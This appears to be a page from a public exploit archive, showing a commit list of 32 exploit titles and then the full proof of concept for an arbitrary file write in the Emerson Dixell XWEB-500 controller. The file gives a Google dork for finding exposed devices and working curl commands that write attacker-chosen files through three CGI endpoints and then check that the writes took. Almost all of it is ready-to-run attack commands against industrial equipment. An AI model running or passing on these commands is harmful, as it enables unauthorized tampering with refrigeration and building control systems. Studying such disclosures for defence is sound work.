1472d8e723
32 changes to exploits/shellcodes Siemens S7 Layer 2 - Denial of Service (DoS) TRIGONE Remote System Monitor 3.61 - Unquoted Service Path Automox Agent 32 - Local Privilege Escalation ConnectWise Control 19.2.24707 - Username Enumeration Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS) AWebServer GhostBuilding 18 - Denial of Service (DoS) TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated) Dixell XWEB 500 - Arbitrary File Write Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated) CMSimple 5.4 - Cross Site Scripting (XSS) RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated) RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated) RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated) WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated) WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated) Movie Rating System 1.0 - SQLi to RCE (Unauthenticated) Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated) Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS) SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS) Nettmp NNT 5.1 - SQLi Authentication Bypass Hostel Management System 2.1 - Cross Site Scripting (XSS) Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated) BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated) Hospitals Patient Records Management System 1.0 - Account TakeOver Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated) Vodafone H-500-s 3.5.10 - WiFi Password Disclosure openSIS Student Information System 8.0 - 'multiple' SQL Injection Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS) WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)
29 lines
No EOL
1.7 KiB
Text
29 lines
No EOL
1.7 KiB
Text
# Exploit Title: Dixell XWEB-500 - Arbitrary File Write
|
|
# Google Dork: inurl:"xweb500.cgi"
|
|
# Date: 03/01/2022
|
|
# Exploit Author: Roberto Palamaro
|
|
# Vendor Homepage: https://climate.emerson.com/it-it/shop/1/dixell-electronics-sku-xweb500-evo-it-it
|
|
# Version: XWEB-500
|
|
# Tested on: Dixell XWEB-500
|
|
# References: https://www.swascan.com/vulnerability-report-emerson-dixell-xweb-500-multiple-vulnerabilities/
|
|
|
|
# Emerson Dixell XWEB-500 is affected by multiple Arbitrary File Write Vulnerability
|
|
|
|
# Endpoint: logo_extra_upload.cgi
|
|
# Here the first line of the POC is the filename and the second one is the content of the file be written
|
|
# Write file
|
|
echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/logo_extra_upload.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
|
|
# Verify
|
|
curl -A Chrome -is "http://[target]:[port]/logo/"
|
|
|
|
# Endpoint: lo_utils.cgi
|
|
# Here ACTION=5 is to enable write mode
|
|
echo -e "ACTION=5\nfile.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
|
|
# Verify using ACTION=3 to listing resources
|
|
echo -e "ACTION=3" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
|
|
|
|
# Endpoint: cal_save.cgi
|
|
# Here the first line of the POC is the filename and the second one is the content of the file be written
|
|
echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_save.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
|
|
# Verify
|
|
curl -A Chrome -kis http://[target]:[port]/cgi-bin/cal_dir.cgi |